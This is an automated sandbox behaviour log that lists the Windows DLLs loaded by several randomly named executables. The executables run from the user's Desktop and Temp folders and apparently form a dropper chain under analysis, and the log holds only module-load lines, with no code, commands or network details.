Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: winmm.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: sspicli.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: wininet.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: ncrypt.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: ntasn1.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: iertutil.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: windows.storage.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: wldp.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: profapi.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: winhttp.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: mswsock.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: winnsi.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: urlmon.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: srvcli.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll
